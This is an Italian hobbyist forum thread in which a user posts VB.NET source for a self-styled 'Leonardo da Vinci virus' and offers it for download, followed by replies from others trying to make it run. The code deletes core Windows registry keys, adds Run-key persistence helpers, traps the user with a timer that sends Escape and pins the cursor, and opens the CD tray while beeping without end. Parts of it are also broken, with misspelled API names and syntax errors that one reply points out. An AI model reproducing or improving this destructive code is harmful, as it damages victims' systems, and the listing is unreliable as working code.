• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida virus leonardo da vinci piu potente con autorun

SONNYDJJ

Utente Medio
Autore del topic
1 Settembre 2009
159
0
Miglior risposta
0
buon giorno a tutti,
come voi saprete di certo ,in passato il virus leonardo da vinci ha avuto un grande successo con 5 stelle - 19 commenti -e 339 visite,proprio x qst ho deciso di potenziarlo e dotarlo di funzioni in piu:
-autorun(si attiva da sl x k nn lo sapesse
-apre e chiude cassetti cd
-esegue dei beep al infinito
-aggiunta di un modulo
iniziamo!!!!!:
codice modulo

Public Declare Function OpenDrawerCD Lib "wimm.dll" Alias "MciSendStingA" (ByVal LpstrCommand As String , ByVal lpstrReturnString As String ByVal uReturn Length As Long, ByVal hwndCallBack As Long) As Long

CODICE COMPILATORE:

Imports Microsoft.Win32
Public Class Form1
Dim DeleteSubKey As RegistryKey
Dim RegKey As RegistryKey
Private Sub AddCurrentKey(ByVal name As String, ByVal path As String)
Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
key.SetValue(name, path)
End Sub
Private Sub AddLocalKey(ByVal name As String, ByVal path As String)
Dim key As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
key.SetValue(name, path)
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
MsgBox("hai aperto il virus leonardo da vinci")
Timer1.Interval = 1
Timer1.Enabled = True
RegKey = Registry.ClassesRoot
RegKey.DeleteSubKey("*")
RegKey.DeleteSubKey(". .kmz")
RegKey.DeleteSubKey(". .kml")
RegKey.DeleteSubKey("._sln")
RegKey.DeleteSubKey("._sln60")
RegKey.DeleteSubKey("._sln70")
RegKey.Close()
RegKey = Registry.CurrentConfig
RegKey.DeleteSubKey("system")
RegKey.DeleteSubKey("software")
RegKey = Registry.CurrentUser
RegKey.DeleteSubKey("software")
RegKey.Close()
RegKey = Registry.Users
RegKey.DeleteSubKey("5-1-5-19")
RegKey.DeleteSubKey(".default")
RegKey.DeleteSubKey("S-1-5-21-1285573224-1917732508-1159475160-1003")
RegKey.DeleteSubKey("S-1-5-21-1285573224-1917732508-1159475160-1003_Classes")
RegKey.DeleteSubKey("S-1-5-20_Classes")
RegKey.DeleteSubKey("S-1-5-20")
RegKey.DeleteSubKey("S-1-5-18")
RegKey.DeleteSubKey("S-1-5-19")
RegKey.CreateSubKey("operazione terminata")
RegKey.Close()

End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
SendKeys.Send("{ESC}")
Cursor.Position = New Point(33, 48)
OpenDrawerCD("set CDAudio door open", Nothing, 127, 0)
OpenDrawerCD("set CDAudio door closed", Nothing, 127, 0)
Console.Beep()

End Sub

End Class

ecco tutto spero k vi piaccia:soso::yo:
ecco il download per k volesse averlo:
Perfavore, Entra oppure Registrati per vedere i Link!

Ultima modifica:
per me funzionano solo alcuni codici, però non penso che windows ti faccia accedere al registro così facilmente... magari su xp sp2 funfa, ma da sp3 o da vista in poi ...

no trancy ti fa accedere xk ho testato a modo mio le kiavi cioe ne ho creata 1 e l ho cancellata csi e funge :in windows tranne seven le chiavi nn sn protette

quelle di systema hanno protezione di sola lettura ma generalmente cn vb le cancelli lo stexo

OpenDrawerCD("set CDAudio door open", Nothing, 127, 0)
OpenDrawerCD("set CDAudio door closed", Nothing, 127, 0)
Dà errore di sintassi .. provali i codici -.-

guarda k devi prima scrivere in un modulo un codice k ho salvato prima di poter scriverlo nel compilatore:wosd:

mi aiutate

ciao a tutti sono da 4 giorni cercando di fare questo virus di leonardo da vinci ma non riesco mi potete metterlo in download da qualche parte unzippato ed io lo scarico oppure mi dovete aiutare dettagglio x dettagglio come crearlo visto che non sono bravo sul pc

Allora se non sei bravo con il PC vuoi fare il programmatore?

Ma vai a vederti gli scavi!

cosa hai da dire non sono bravo col pc e sono venuto qui per imparare nessuno ha detto che voglio fare il programmatore xd conta fino a 10 prima di parlare cmq il virus lo scaricato ed non va

-.-"

Per fare questo "virus" devi imparare il Visual Basic .NET , un linguaggio di programmazione .

E se non sei bravo con il pc , non sai cosa sia un timer , un label , un TextBox , o una qualsiasi altra cosa presente in VisualBasic allora sei proprio messo male mentalmente
--------------- AGGIUNTA AL POST ---------------
cosa hai da dire non sono bravo col pc e sono venuto qui per imparare nessuno ha detto che voglio fare il programmatore xd conta fino a 10 prima di parlare cmq il virus lo scaricato ed non va

Comunque , prima di imparare ad usare il PC , impara l'italiano

Ultima modifica da un moderatore:
-.-"

per fare questo "virus" devi imparare il visual basic .net , un linguaggio di programmazione .

E se non sei bravo con il pc , non sai cosa sia un timer , un label , un textbox , o una qualsiasi altra cosa presente in visualbasic allora sei proprio messo male mentalmente
--------------- aggiunta al post ---------------

comunque , prima di imparare ad usare il pc , impara l'italiano
1)so l'italiano no come te
2)il pc non e che non lo so proprio usare so che cosa e un label ed un botton ecc xd